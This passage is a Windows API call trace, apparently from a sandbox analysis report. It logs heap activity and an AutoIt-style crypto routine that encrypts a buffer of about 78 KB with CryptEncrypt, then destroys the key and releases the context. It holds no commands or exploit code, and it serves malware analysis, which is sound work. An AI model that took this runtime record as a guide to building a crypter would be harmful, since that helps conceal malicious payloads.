0x889730 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0039.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.258] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.258] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0039.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.259] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.259] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da248, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da248*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.259] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.259] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.259] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.259] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.259] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.259] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.259] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.259] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.260] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0039.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.260] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.260] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.260] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.260] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.260] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.260] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.260] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.260] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.260] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.260] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0039.261] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.261] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.261] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x131c1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x131d0) returned 1 [0039.261] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.261] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.261] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.261] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.262] CharLowerBuffW (in: lpsz="byte[78289]", cchLength=0xb | out: lpsz="byte[78289]") returned 0xb [0039.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.263] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.263] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.263] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.263] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95b3a8*, pdwDataLen=0x6ae220*=0x131c1, dwBufLen=0x131d0 | out: pbData=0x95b3a8*, pdwDataLen=0x6ae220*=0x131d0) returned 1 [0039.264] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.264] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.264] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.264] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.264] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.264] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.264] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0039.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.264] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.264] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.264] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.264] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.264] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.264] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.264] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.265] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.265] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0039.265] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.272] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.272] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.272] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.274] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.274] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.274] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.274] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.274] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.274] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0039.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.274] CryptDestroyKey (hKey=0x7c2280) returned 1 [0039.275] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.275] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.275] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0039.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.275] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.275] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.275] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.275] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0039.275] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.275] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.275] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0039.275] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0039.275] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.275] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.275] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.276] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.276] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0039.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.276] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.276] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.276] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.276] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.276] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.276] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.276] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.276] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.276] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.276] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.276] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0039.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.276] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.277] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.277] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0039.277] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.277] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.277] HeapFree (in: 